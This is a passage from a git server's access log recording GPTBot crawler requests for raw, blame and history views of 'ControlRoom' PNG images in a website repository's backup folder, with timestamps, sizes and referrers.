+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429965] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429966] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429969] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498861] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508484] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" -[17/Feb/2026:14:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:14:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:14:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699421] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:14:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:14:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" -[17/Feb/2026:14:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" -[17/Feb/2026:14:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" -[17/Feb/2026:14:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508486] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699430] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498862] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692372] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" -[17/Feb/2026:14:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692382] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" -[17/Feb/2026:14:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508485] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" -[17/Feb/2026:14:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" -[17/Feb/2026:14:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" -[17/Feb/2026:14:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641806] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692377] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508483] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 